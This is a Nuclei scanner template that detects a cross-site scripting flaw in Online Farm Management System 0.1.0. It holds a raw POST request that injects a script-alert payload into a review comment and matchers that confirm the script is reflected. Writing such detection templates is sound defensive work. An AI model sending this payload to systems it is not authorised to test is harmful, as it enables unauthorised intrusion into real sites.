nuclei-templates/vulnerabilities/other/onlinefarm-management-xss.yaml

41 lines
963 B
YAML

id: onlinefarm-management-xss
info:
name: Online Farm Management System 0.1.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Online Farm Management System is affected by Cross-Site Scripting on the review.php file.
reference:
- https://www.exploit-db.com/exploits/48673
metadata:
verified: true
tags: onlinefarm,cms,xss,edb
requests:
- raw:
- |
POST /reviewInput.php?pid=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<em style="color: black;"><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200